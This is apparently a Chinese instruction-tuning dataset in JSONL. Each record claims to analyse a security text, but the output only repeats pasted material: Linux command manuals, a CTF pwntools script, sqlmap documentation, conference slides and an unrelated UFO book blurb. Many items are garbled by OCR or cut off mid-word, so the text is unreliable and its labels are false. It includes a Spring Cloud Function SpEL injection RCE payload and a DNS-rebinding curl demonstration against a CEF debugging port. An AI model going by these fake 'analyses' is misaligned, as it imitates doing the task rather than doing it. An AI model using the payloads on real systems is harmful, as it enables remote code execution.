{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nvdfuse === VirtualBox软件挂载VDI分区文件工具 ## 补充说明 **vdfuse命令** 是VirtualBox软件挂载VDI分区文件的一个工具VirtualBox是一款能创建虚拟机的开源软件vdi是它的默认磁盘格式 ### 什么是VirtualBox VirtualBox是一款功能强大的x86虚拟机软件它不仅具有丰富的特色而且性能也很优异更可喜的是VirtualBox于数日前走向开源成为了一个发布在GPL许可之下的自由软件VirtualBox可以在Linux和Windows主机中运行并支持在其中安装Windows (NT 4.02000XPServer 2003Vista)DOS/Windows 3.xLinux (2.4 和 2.6)OpenBSD等系列的客户操作系统 **在Ubuntu中安装vdfuse打开终端输入** ```shell sudo apt-get install virtualbox-fuse ``` ### 语法 ```shell vdfuse [options] -f image-file mountpoint ``` ### 选项 ```shell -h 帮助 -r 只读 -t 类型 (VDI, VMDK, VHD, or raw; default: auto) -f 镜像文件 -a 允许所有用户读取 -w 允许所有用户都写 -g 前台运行 -v 输出反馈 -d debug模式 ``` 注意必须编辑一下`/etc/fuse.confand`去掉 \"user_allow_other\" 前面的注释符号#否则不能正确运行 ### 实例 使用如下如下语句挂载.vdi文件 ```shell sudo vdfuse -f /path/to/file.vdi /path/to/mountpoint ``` `/path/to/mountpoint`应该包含如下文件EntireDiskPartition1等如果只有一个文件你可能需要这样挂载 ```shell mount /path/to/mountpoint/Partition1 /path/to/someother/mountpoint ``` 文件系统就挂载到`/path/to/someother/mountpoint`了", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ncdrecord === Linux系统下光盘刻录功能命令 ## 补充说明 **cdrecord命令** 用于Linux系统下光盘刻录它支持cd和DVD格式linux下一般都带有cdrecord软件 ### 语法 ```shell cdrecord(选项)(参数) ``` ### 选项 ```shell -v显示刻录光盘的详细过程 -eject刻录完成后弹出光盘 speed=<刻录倍速>指定光盘刻录的倍速 dev=<刻录机设备号>指定使用-scanbus参数扫描到的刻录机的设备号 -scanbus扫描系统中可用的刻录机 ``` ### 参数 ISO文件指定刻录光盘使用的ISO映像文件 ### 实例 查看系统所有 CD-R(w) 设备 ```shell cdrecord -scanbus scsibus0: 0,0,0 0) * 0,1,0 1) * 0,2,0 2) * 0,3,0 3) 'HP ' 'CD-Writer+ 9200 ' '1.0c' Removable CD-ROM ``` 用iso文件刻录一张光盘 ```shell cdrecord -v -eject speed=4 dev=0,3,0 backup.iso ``` 参数解释 * -v显示刻录光盘的详细过程 * -eject刻完自动弹出光盘 * speed=4 dev=0,3,0四速刻录到HP CD-writer设备上 擦写光驱 ```shell cdrecord --dev=0,3,0 --blank=fast ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom pwn import * import binascii import hashlib code = {'A': '.-', 'B': '-...', 'C': '-.-.', 'D': '-..', 'E': '.', 'F': '..-.', 'G': '--.', 'H': '....', 'I': '..', 'J': '.---', 'K': '-.-', 'L': '.-..', 'M': '--', 'N': '-.', 'O': '---', 'P': '.--.', 'Q': '--.-', 'R': '.-.', 'S': '...', 'T': '-', 'U': '..-', 'V': '...-', 'W': '.--', 'X': '-..-', 'Y': '-.--', 'Z': '--..', '0': '-----', '1': '.----', '2': '..---', '3': '...--', '4': '....-', '5': '.....', '6': '-....', '7': '--...', '8': '---..', '9': '----.' } revcode={} for c in code: revcode[code[c]]=c def morse_dec(msg): res=\"\" for word in msg.strip().split(): res=res+revcode[word] return res def morse_enc(msg): res=\"\" for c in msg: res=res+code[c.upper()]+\" \" return res.strip() def decrypt(s): h=hex(int(morse_dec(s), 36)).strip(\"L\")[2:] if len(h)%2==1: h=\"0\"+h h=binascii.unhexlify(h) return h def base36encode(number): if not isinstance(number, (int, long)): raise TypeError('number must be an integer') if number < 0: raise ValueError('number must be positive') alphabet, base36 = ['0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ', ''] while number: number, i = divmod(number, 36) base36 = alphabet[i] + base36 return base36 or alphabet[0] def encrypt(s): h=morse_enc(base36encode(int(binascii.hexlify(s), 16))) return h r=remote(\"morset.pwning.xxx\", 11821) context.log_level=\"DEBUG\" s=r.recvline() h=decrypt(s) print h h=h.split(\"SHA256\")[1][1:].split(\")\")[0] print h #r.sendline(morse_enc(hashlib.sha256(h).hexdigest())) r.sendline(encrypt(hashlib.sha256(h).hexdigest())) s=r.recvline() print decrypt(s) r.recvall()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# sqlmap软件包描述 sqlmap是一个开源的渗透测试工具它可以自动化检测和利用SQL注入漏洞并接管数据库服务器它有一个强大的检测引擎许多适合于终极渗透测试的良好特性和众多的操作选项从数据库指纹数据获取到访问底层文件系统执行操作系统命令 特点: - 全面支持MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB数据库管理系统 - 全面支持六种SQL注入技术:boolean-based盲注time-based盲注error-basedUNION查询堆叠查询和带外查询 - 通过提供DBMS凭证IP地址端口和数据库名支持不通过SQL注入的直接连接数据库 - 支持枚举用户密码哈希特权角色数据库表和列 - 自动识别密码哈希格式支持基于字典的攻击破解 - 支持完整转储数据库表根据用户的选择转储一定范围内的条目或特定列用户还可以选择只从每列中转储指定字符 - 支持搜索特定的数据库名表名或跨表搜索特定的列名这非常有用例如识别包含自定义应用程序凭证的表其相关列名称可能包含namepass等字符串 - 支持通过数据库服务器所在的文件系统下载和上传任何文件当数据库软件是MySQL, PostgreSQL或Microsoft SQL server时 - 支持通过数据库服务器所在的操作系统执行任意命令并获取输出当数据库软件为MySQLPostgreSQL或Microsoft SQL server时 - 支持在攻击者机器和数据库服务器所在操作系统之间建立带外有状态的TCP连接这个通道根据用户的选择可以是交互式命令行Meterpreter会话或图形用户界面(VNC) - 支持通过Metasploit的getsystem命令实现数据库进程的用户权限升级 资料来源:http://sqlmap.org/ [sqlmap主页](http://sqlmap.org/) | [Kali sqlmap软件源](http://git.kali.org/gitweb/?p=packages/sqlmap.git;a=summary) - 作者:Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar - 许可:GPLv2 ## sqlmap包中包含的工具 ### sqlmap -自动SQL注入工具 ``` root@kali:~# sqlmap -h Usage: python sqlmap [options] Options: -h, --help 显示基本的帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序的版本号并退出 -v VERBOSE 显示详细信息级别: 0-6 (default 1) Target: 至少必须提供一个选项来指定目标 -u URL, --url=URL 目标URL (e.g. \"http://www.site.com/vuln.php?id=1\") -g GOOGLEDORK 将Google dork结果作为目标URLs Request: 这些选项用于指定如何连接到目标URL --data=DATA 通过POST方法传送字符串 --cookie=COOKIE 指定HTTP Cookie值 --random-agent 随机选择HTTP User-Agent值 --proxy=PROXY 指定连接代理 --tor 使用Tor匿名网络 --check-tor 检查Tor网络是否可用 Injection: 这些选项可用于指定要测试的参数提供自定义注入载荷和可选的伪造脚本 -p TESTPARAMETER Testable参数 --dbms=DBMS 强制指定后端DBMS类型 Detection: 这些选项可用于定制检测阶段 --level=LEVEL Level of tests to perform (1-5, default 1) --risk=RISK Risk of tests to perform (0-3, default 1) Techniques: 这项选项可用于优化特定的SQL注入技巧 --technique=TECH SQL injection techniques to use (default \"BEUSTQ\") Enumeration: 这些选项可用于枚举后端数据库管理系统中包含的信息结构和数据表此外还可以运行自己的SQL语句 -a, --all 获取所有信息 -b, --banner 获取DBMS banner --current-user 获取DBMS当前用户 --current", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Julian Grizzard DEFCON 13 Surgical Recovery from Kernel-Level Rootkit Installations Speaker: Julian Grizzard July 2005 DEFCON THIRTEEN 2 Julian Grizzard DEFCON 13 Latest Slides and Tools PLEASE DOWNLOAD THE LATEST SLIDES AND TOOLS [ Latest slides available ] http://www.ece.gatech.edu/research/labs/nsa/presentations/dc13_grizzard.pdf [ Latest system call table tools ] http://www.ece.gatech.edu/research/labs/nsa/sct_tools.shtml [ Latest spine architecture work ] http://www.ece.gatech.edu/research/labs/nsa/spine.shtml 3 Julian Grizzard DEFCON 13 Talk Overview Talk focuses on Linux i386 based systems  Rootkit background  System call table tools  Demos  L4 microkernel introduction  Spine architecture  Intrusion recovery system (IRS)  Demos  Concluding remarks 4 Julian Grizzard DEFCON 13 Rootkit Functionality  Retain Access  Trojan sshd client with hard coded user/pass for root access  Initiate remote entry by specially crafted packet stream  Hide Activity  Hide a process including resource usage of process  Hide malicious rootkit kernel modules from lsmod 5 Julian Grizzard DEFCON 13 Additional Malware Functionality  Information harvesting  Credit cards  Bank accounts  Resource usage  Spam relaying  Distributed denial of service 6 Julian Grizzard DEFCON 13 User-Level versus Kernel-Level  User-Level  Modify/replace system binaries  e.g. ps, netstat, ls, top, passwd  Kernel-Level  Modify/replace kernel process  e.g. system call table 7 Julian Grizzard DEFCON 13 History of Kernel-Level Rootkits  Heroin  October 1997  First public LKM  Knark  June 1999  Highly popular LKM  SucKIT  December 2001  First public /dev/kmem entry  Adore-ng 0.31  January 2004  Uses VFS redirection; works on Linux 2.6.X 8 Julian Grizzard DEFCON 13 Kernel-Level Rootkit Targets  System call table  Interrupt descriptor table  Virtual file system layer  Kernel data structures 9 Julian Grizzard DEFCON 13 Kernel Entry  Linux kernel module (LKM)  /dev/kmem, /dev/mem, /dev/port  Direct memory access (DMA) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Atttt SSaattaann m myy FFrriieenn ttttaacckkiinngg SSoocc :::: D DeeffCCoonn SSiixxtteeee SShhaaw wnn M M aanndd N Naatthhaann H H n iiss oonn nnddss LLiisstt :: cciiaall N Neettw woorrkk eenn ((FFTTM MFFW W)) :::: M Mooyyeerr dd H Haam miieell kkss \"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not! It can't even be said to have a 'design.' If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening. Trust model? What's that? The so-called vulnerability 'researchers' are already sharpening their knives for the coming feast.\" :: Marcus Ranum in InfoSec Magazine, May 2008 P.S. Thanks for lending us a whetstone, Marcus. =) Table of Contents :: About the authors ........................................................................................................... 3 :: Introduction ................................................................................................................... 4 :: Vivisecting The Social Net Model ....................................................................................... 5 :: Connections, Entities ............................................................................................. 5 :: Personae and Simulacra ......................................................................................... 5 :: Culture of Trust .................................................................................................... 6 :: Framework and Platform ........................................................................................ 6 :: Attacking Social Networks ................................................................................................ 7 :: Attacking Social Network Functionality ..................................................................... 7 :: Attacking Via Offsite Content ..............................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01 应用简介 Spring Cloud Function 是 SpringBoot 开发的一个 Servless 中间件FAAS支持基于 SpEL 的函数 式动态路由 0x02 漏洞复现 测试版本 测试环境 第 1 种利用需要修改配置 + 任意路由 这种利用方式来自 逐日实验室 @默安 1. 修改配置文件添加 \"spring.cloud.function.definition:functionRouter\" 2. 任意路由 # v3.2.0 https://github.com/spring-cloud/spring-cloud-function/releases/tag/v3.2.0 1 2 spring-cloud-function-samples/function-sample-pojo 1 application.properties 1 3. 构造 SpEL 注入 payload 4. 测试效果 但是 为了尽可能扩大漏洞的利用价值能在默认配置下进行利用无疑是我们的首选于是去啃了会儿官方文 档和相关社区然后发现一种可在默认配置下进行 RCE 的姿势暂不确定影响范围 已测试版本 第 2 种利用默认配置 + 特定路由 1. 保持默认配置 2. 特定路由 /aaaa 1 spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(\"calc\") 1 v3.2.0v3.1.6v3.0.9 1 application.properties 1 /functionRouter 1 3. 构造 SpEL 注入 payload 4. 测试效果 ps: 为了确保准确性在该环境测试任意路径 0x03 漏洞分析 补丁分析 spring.cloud.function.routing- expression: T(java.lang.Runtime).getRuntime().exec(\"calc\") 1 由于第1种已经有人分析了 这里只分析第2种场景默认配置+特定路由 1 2 org.springframework.cloud.function.context.config.RoutingFunction 在此处下断点后获取到调用栈 然后往下跟踪 & 向上回溯 https://github.com/spring-cloud/spring-cloud- function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52 1 org.springframework.cloud.function.context.config.RoutingFunction#route 1 route:125, RoutingFunction (org.springframework.cloud.function.context.config) apply:85, RoutingFunction (org.springframework.cloud.function.context.config) doApply:698, SimpleFunctionRegistry$FunctionInvocationWrapper (org.springframework.cloud.function.context.catalog) apply:550, SimpleFunctionRegistry$FunctionInvocationWrapper (org.springframework.cloud.function.context.catalog) processRequest:100, FunctionWebRequestProcessingHelper (org.springframework.cloud.function.web.util) post:74, FunctionController (org.springframework.cloud.function.web.flux) invoke0:-1, NativeMethodAccessorImpl (sun.reflect) invoke:62, NativeMethodAccessorImpl (sun.reflect) invoke:43, DelegatingMethodAccessorImpl (sun.reflect) invoke:498, Method (java.lang.reflect) lambda$invoke$0:144, InvocableHandlerMethod (org.springframework.web.react", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n客户端 Web 漏洞案例浅析 2021/6/26 成都站 周智 深信服安全 技术沙 纲  总结些难以归类的客户端混合漏洞案例  CEF DNS rebinding 通漏洞  CVE-2020-9860: macOS HelpViewer XSS  某 iOS 应跨 App 获取 cookie  iOS WebView UXSS  某 Windows 视频客户端远程 DLL 注 CEF DNS rebinding 通漏洞 CEF  CEF 全称 Chromium Embedded Framework  在桌应中嵌 Chromium 内 核的 WebView 控件 DNS rebinding  种利 DNS 域名解析绕过同源策略的法  通过对同域名前后返回不同地址  ip1 的可以借受害者浏览器访问 ip2 的 http 服务 恶意 内 http 服务 evil.rebind.com 123.123.123.123 evil.rebind.com 192.168.0.1 CEF 远程调试  部分桌客户端误将 CEF 远程调试打开  即 Chrome Remote Debugging 协议基于 HTTP 和 WebSocket  攻击者使 DNS rebinding 可以直接访问 127.0.0.1 的 http 响应  获得 token 之后 WebSocket 完全接管内容进步 RCE 等  CEF 最新版本已经修复 Chrome 远程调试持 $ curl -v localhost:12345/json -H \"Host: evil.com:12345\" * Trying 127.0.0.1... * TCP_NODELAY set * Connected to localhost (127.0.0.1) port 12345 (#0) > GET /json HTTP/1.1 > Host: evil.com:12345 > User-Agent: curl/7.58.0 > Accept: */* > < HTTP/1.1 200 OK < Content-Length:912 < Content-Type:application/json; charset=UTF-8 < [{ \"description\": \"\", \"devtoolsFrontendUrl\": \"/devtools/inspector.html?ws=localhost:12345/devtools/page/ 51CC21EE-2FC2-4434-923A-68E7852665BA\", \"id\": \"51CC21EE-2FC2-4434-923A-68E7852665BA\", \"title\": \"example\", \"type\": \"page\", \"url\": \"https://example.com/\", \"webSocketDebuggerUrl\": \"ws://localhost:12345/devtools/page/ 51CC21EE-2FC2-4434-923A-68E7852665BA\" }] $ curl -v localhost:12345/json -H \"Host: evil.com:12345\" * Trying 127.0.0.1... * TCP_NODELAY set * Connected to localhost (127.0.0.1) port 12345 (#0) > GET /json HTTP/1.1 > Host: evil.com:12345 > User-Agent: curl/7.58.0 > Accept: */* > < HTTP/1.1 200 OK < Content-Length:912 < Content-Type:application/json; charset=UTF-8 < [{ \"description\": \"\", \"devtoolsFrontendUrl\": \"/devtools/inspector.html?ws=localhost:12345/devtools/page/ 51CC21EE-2FC2-4434-923A-68E7852665BA\", \"id\": \"51CC21EE-2FC2-4434-923A-68E7852665BA\", \"title\": \"example\", \"type\": \"page\", \"url\": \"https://example.com/\", \"webSocketDebuggerUrl\": \"ws://localhost:12345/devtools/page/ 51CC21EE-2FC2-4434-923A-68E7852665BA\" }] $ c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnomalist Books AnomalistBooks.com Credible people have seen incredible things. Major General John Samford Chief of Intelligence United States Air Force March 1953 Governments around the world have had to deal with the UFO phenomenon for a good part of a century. How and why they did so is the subject of UFOs and Gov- ernment, a history that for the fi rst time tells the story from the perspective of the governments themselves. Its a perspec- tive that reveals a great deal about what we citizens have seen, and puzzled over, from the outside for so many years. The story, which is unmasked by the governments own documents, explains much that is new, or at least not com- monly known, about the seriousness with which the military and intelligence com- munities approached the UFO problem internally. Those approaches were not taken lightly. In fact, they were consid- ered matters of national security. At the same time, the story reveals how a sub- ject with such apparent depth of experi- ence and interest became treated as if it were a triviality. And it explains why one government, the United States govern- ment, deemed it wise, and perhaps even necessary, to treat it so. Though the book focuses primarily on the U.S. governments response to the UFO phenomenon, also included is the treat- ment of the subject by the governments of Sweden, Australia, France, Spain, and other countries. While UFOs and Government revisits an often unhappy history, the reading of it is far from an unhappy experience. The authors, eloquent, intelligent, sophisticated, and con- scientious, provide us with the fi rst credible, comprehensive overview of offi cial UFO history in many years Most of the current volume deals with U.S. military and intelligence responses to the UFO phenomenon, but it also features richly informative chapters that expand the story across the international arena. If youre looking for an example of a nation that dealt productively with the UFO reports that came its offi cial ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 二次登陆导致的权限提升 1.1 登陆的实现 登陆功能应该是Web项目里里见到的比较多的业务模块的通常会跟session会话结合完成对应的操 作常见的实现过程如下 session本身是一个容器器里里面可以存放类似用户身份等权限控制所需的元素在对应的接口完成对 应的鉴权功能最简单的例例如如果在当前会话session中没有找到对应的登陆凭证说明用户没有登录 或者登录失效如果找到了了证明用户已经登录可执行行后面操作防止接口的未授权访问或者是权限细 粒度覆盖业务接口将业务相关的关键参数例例如useridfileid等与当前用户的身份凭证一般是 session进行行绑定防止越权操作 正常业务场景下用户在进行行身份认证后便便使用当前会话进行行业务操作了了例例如查询个人信息 进行行下订单等此时若尝试使用当前会话继续访问登陆认证接口进行行二次登陆又可能会发生什什么 事情呢重复登录又可能对session中的内容造成什什么样的影响呢 1.2 二次\"登陆\"带来的权限提升 在某次审计过程中发现了了这样的一个有趣的安全问题在进行行身份认证后尝试再使用当前会 话继续访问登陆认证接口使用错误的账号密码进行行二次登陆然后发现当前会话的角色权限提升 了了部分管理理员接口可以进行行访问并进行行业务操作了了以下是相关过程 首先是登陆认证的接口 @RequestMapping(value={\"auth\"}method=RequestMethod.POST) 首先检查用户关键输入用户名密码是否为null然后通过service层方法进行行用户密码的有效性 检查返回对应的user对象如果返回的对象不不为null那么在session中存入当前user对象并且设置登 录状态loginStatus为true否则清空当前session中的user提示用户名密码错误简单的流程如下 再来看一下相关权限控制的安全防护 通过拦截器器对于接口的访问进行行控制结合登陆成功后的loginStatus内容防止在非登陆情况下进 行行未授权访问 @ResponseBody public JsonResponse LoginInterface(String username,String password,HttpServletRequest request,HttpSession session,Model model){ if(username==null||username.toString().equals(\"\")){ return JsonResponse.fail(\"请输入用户名\") } if(password==null||password.toString().equals(\"\")){ return JsonResponse.fail(\"请输入密码\") } //查询用户 SysUser user = null; try{ user = userservice.find(username,password); }catch(Exception e){ user = null; } if(user==null||user.isEmpty()){ session.removeAttribute(\"user\"); return JsonResponse.fail(\"用户名密码错误\") } session.setAttribute(\"user\",user); session.setAttribute(\"loginStatus\",true); return JsonResponse.succ(\"success\"); } 查看下查询用户绑卡信息的接口 可以看到这里里跟管理理员admin的查询接口是复用的如果当前登陆用户不不是admin则调用service层 的findByUser方法返回当前用户绑定的卡号信息否则返回所有用户的绑卡信息admin管理理员查 询以查看下查询用户绑卡信息业务为例例相关流程如下 public class LoginedInterceptor extends HandlerInterceptorAdapter{ @Override public boolean preHandle(HttpServletRequest request,HttpServletResponse response,Object handler) throws Exception{ HttpSession session = request.getSession(); boolean loginStatus = session.getAttribute(SystemBaseConstant.LOGIN_STATUS); if(loginStatus==null||\"\".equals(loginStatu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMeme Mining for Fun Meme Mining for Fun and Profit and Profit By Broward Horne By Broward Horne DefCon DefCon 13 13 33--Part Presentation Part Presentation Tactical Tactical  MemeMiner MemeMiner Parlor Tricks Parlor Tricks Operational Operational  SS--curve theory curve theory Strategic Strategic  Social Bandwidth Social Bandwidth Dot Com Crash Continues? Dot Com Crash Continues? Recent layoffs in 2005 Recent layoffs in 2005 IBM IBM  13,000 13,000 Hypercom Hypercom Sun Sun  another 5% another 5% BMC BMC GM GM  25,000 25,000 Krispy Krispy Kreme Kreme GE GE  reorganization reorganization Cray Cray Alcoa Alcoa  6,500 6,500 DHL DHL Winn Dixie Winn Dixie  22,000 22,000 American Express American Express Lear Lear  7,700 7,700 What To Do? What To Do? Your time and effort are finite. Your time and effort are finite. The IT market changes constantly. The IT market changes constantly. What skills should you focus on? What skills should you focus on? A mistake can be costly. A mistake can be costly. Me Me Why should you listen to me? Why should you listen to me? Hacked some systems prior to 1991 Hacked some systems prior to 1991 SS--Curve Curve Fundamental business function Fundamental business function SS--Curve Curve Rate of change in normal curve Rate of change in normal curve Meme Mining Theory Meme Mining Theory Frequency count is proxy for S Frequency count is proxy for S--curve curve Monitor technical trends Monitor technical trends Ride the S Ride the S--curve curve Example Example Delphi Programming Language Delphi Programming Language Meme Miner Meme Miner Simple java program Simple java program Executes sequential queries Executes sequential queries Builds chart with query results Builds chart with query results DejaNews DejaNews Frequency Count Frequency Count Rough Proxy for Internet Growth Rough Proxy for Internet Growth Major Events Major Events Historical Graphs Historical Graphs Delphi Delphi Historical Graphs Historical Graphs Work Work  can you identify the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYang Zhang and his research group (CISPA Helmholtz Center for Information Security) Yun Shen (Spot by NetApp) Azzedine Benameur (Spot by NetApp) All Your GNN Models And Data Belong To Me *All attacks discussed in this talk are simulated in the lab environment. * The Age of Machine Learning Image source (from left to right): https://github.com/deepmind/alphafold https://emergetech.org/openai-gpt3-good-at-almost-everything/ https://github.com/features/copilot/signup https://imagen.research.google/ Image/Text/Video/Audio Graph Graphs Are Everywhere Social Networks Knowledge Graphs Image source: (from left to right): https://towardsdatascience.com/ab-testing-challenges-in-social-networks-e67611c92916, https://biologydictionary.net/molecule/, https://yashuseth.blog/2019/10/08/introduction-question-answering-knowledge-graphs-kgqa/ Molecules Graphs are combinatorial structures, have arbitrary sizes, and contain multi-modal information User-Item Graphs Graph Applications Are Everywhere Social Networks Knowledge Graphs Image source: (from left to right): https://towardsdatascience.com/ab-testing-challenges-in-social-networks-e67611c92916, https://biologydictionary.net/molecule/, https://yashuseth.blog/2019/10/08/introduction-question-answering-knowledge-graphs-kgqa/ Molecules User-Item Graphs Link Prediction Toxicity Prediction Knowledge Mining Recommendation Alice Bob Do you (Alice) know Bob? We found an item you may be interested! Graph-based applications pervasively exist in our everyday life Demographic Inference Age group of Bob Graph Neural Netwok (GNN)  Traditional neural networks are designed for grids (e.g., images) or sequences (e.g., text)  CNNs for images  RNNs for sequences Graph Neural Netwok (GNN) Graph Convolution Network (GCN) Graph Sample and Aggregate (GraphSAGE) Graph Isomorphism Network (GIN) Graph Attention Network (GAT) Link Prediction Do you (Alice) know Bob? Demographic Inference Age group of Bob Euclidean Space Graph Neural Netwok (GNN) Toxicity Pre", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Math aside, we're all black hats Now(trivia, 10p, 551 solves) `This Pentesting expert supplied HBO's Silicon Valley with technical advice in season 2. The flag is his twitter handle.` ### PL Version `for ENG version scroll down` Zadanie polegało na znalezieniu loginu na twitterze pentestera który pracował jako doradca przy 2 sezonie serialu Silicon Valley. Chwila googlowania pozwala dowiedzieć się że jest to `Rob Fuller` więc flaga to `mubix` ### ENG Version The task was to find a twitter handle of a real pentester who was advising Silicon Valley cast for the second season of the show. A little googling was needed to find that it was `Rob Fuller` and thus the flag is `mubix`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntimeless attackpipeline 0x00 rce blackhattimeless attack timeless attacktimeless attack 0x01 timeless attack blackhathttps://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Timeless-Timing-Attacks.pdf TQLCTFwriteup https://blog.zeddyu.info/2022/02/21/2022-02-21-PracticalTimingTimeless/ str = \"hello\" for i in range(len(str)): if input[i] == str[i]: continue else: break inputstr input1 = \"haxxx\" input2 = \"hexxx\"input1input2 input1input2input1input2 1 str timeless attack timelesshttp2.0Multiplexing http2.0Multiplexing http http1.0 tcp http1.1 keepalive tcp http1.1 pipeline tcp http2.0 Multiplexing tcphttp2.0h2 https://www.cnblogs.com/cmyoung/p/14604135.html Multiplexing h2 httpstream identifier h2 h2idh2http h2h2 timeless attack h2 0x02 pipeline timeless attack timeless attackhttp2.0http1.1 http1.1timeless attack http1.1pipelinepipeline 1. pipeline 2. 1clhttp 3. 1tcp1 2 tcppipeline php //1.php <?php <?php sleep(5); echo \"hello\\n\"; list($t1, $t2) = explode(' ', microtime()); echo (float)sprintf('%.0f',(floatval($t1)+floatval($t2))*1000); ?> ?> //2.php <?php <?php echo \"hello2\\n\"; list($t1, $t2) = explode(' ', microtime()); echo (float)sprintf('%.0f',(floatval($t1)+floatval($t2))*1000); ?> ?> php1.php52.phpphp burp2.php1.php pipelineget wireshark wiresharktcp finburp 1. 1.php1649358045734 2. 2.php1649358045735 2.php1.php1pipeline 1. pipeline 2. pipeline12 0x03 pipelinetimeless pipelinepipelineAB1ms A*1000B*10001 1000 pipelineapache keepalive tcp100 keep-alivemax=100pipeline100 keepalivetimeoutmaxpipeline pipeline pipeline fofakeepalive 300wmax 20wkeepalivepipeline 0x04 timeless attackhttp1.1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhostid === 显示当前主机的十六进制数字标识 ## 概要 ```shell hostid [OPTION]... ``` ## 主要用途 - 显示当前主机的十六进制标识符 - 用来限制软件的使用权限不可改变 ## 选项 ```shell --help 显示帮助信息并退出 --version 显示版本信息并退出 ``` ## 例子 ```shell [root@localhost ~]# hostid 007f0100 ``` ### 注意 1. 该命令是`GNU coreutils`包中的命令相关的帮助信息请查看`man -s 1 hostid``info coreutils 'hostid invocation'`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright 2003 Corporate Defense Strategies 1 TSCM The real story behind sweeping for eavesdropping devices ECHNICAL ECURITY OUNTER EASURES Jeffrey S. Prusan Michael D. Glasser Copyright 2003 Corporate Defense Strategies 2 TSCM Outline Tools used for sweeps Demo of how phones are tapped Signs that your offices are Bugged Who gets Bugged? How corporate spies infiltrate your infrastructure Spy shop toys What to do if you suspect youve been bugged Planning an execution of a successful sweep How to protect your company in the future against eavesdroppers Copyright 2003 Corporate Defense Strategies 3 TSCM Tools Used for Sweeps Copyright 2003 Corporate Defense Strategies 4 TSCM Tools used for sweeps Time Domain Reflectometer NearField Detector Non-Linear Junction Detector Spectrum Analyzer Oscilloscope Physical Inspection Copyright 2003 Corporate Defense Strategies 5 TSCM Time Domain Reflectometer Copyright 2003 Corporate Defense Strategies 6 TSCM Time Domain Reflectometer Time Domain Reflectometry is the analysis of a conductor (wire, cable, or fiber optic) by sending a pulsed signal into the conductor, and then examining the reflection of that pulse. By examining the polarity, amplitude, frequencies and other electrical signatures of all reflections; tampering or bugs may be precisely located. Any device or wire attached will cause a detectable anomaly, the TSCM technician will then perform a physical inspection at the location of the anomaly. TDR analysis will usually NOT detect capacitively isolated devices or inductive taps. In the case of capacitively isolated device or inductive tap, the TDR sweep is always supplemented by a detailed high frequency cross talk evaluation and a detailed physical inspection. Copyright 2003 Corporate Defense Strategies 7 TSCM Time Domain Reflectometer Signal Generator Pulse injected into cable Echo Received from Pulse (Reflection) The delay between the initial pulse and the reflected pulse indicate the length of the cable (or the locat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDavid Mortman, Dell  Rob Graham, ErrataSec  Dave Maynor, ErrataSec  Chris Hoff, Juniper  James Arlen, Liquid Matrix  Larry Pesce, PaulDotCom  Rich Mogull, Securosis  Alex R. Shostack Esq, Ars Infosectica Fail Panel Five", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Year of HD Voice -- 2010 Who, what, where, how? (Actually, who, how, where, what) Doug Mohney - Background  Following the ICT sector for over two decades  Writing for Boardwatch, The Inquirer, VON Magazine (Pulvermedia), TMC  Started HD voice coverage in May 2009  Launch of HD Voice News (HD Connect Now) in August 2009 The 2009 HD voice wake-up call  France Telecom deployments  Broadband: Over 500,000 G.722 VoIP endpoints  Mobile: AMR-WB deployed in Moldova  Global Crossing  Built HD conference bridge for customer  Working on open HD conferencing bridge  Verizon Business  Close to 5,000 phones at HQ  Expects early adopters in 2010, general availability in 2011  Cablevision (Optimum Lightwave)  Deployed hosted HD voice service in 2H09 Yes  Once again, the United States of America is being outclassed by the rest of the world in telecommunications technology. Or  U.S. carriers will wait until the smoke clears and then get a deal because someone else has done the hard R&D Who: Companies in HD voice ecosystem  IP desktop handset manufacturers  ALL major  Aastra, AudioCodes, Avaya, Cisco, Polycom  Mobile handset manufacturers  Nokia, Sony Ericsson declared, anyone with Android & 4G, others to come  Network core  Aculab, Dialogic, D2 Technologies, Ericsson, Trinity Convergence  Applications  BroadSoft, CommuniGate, 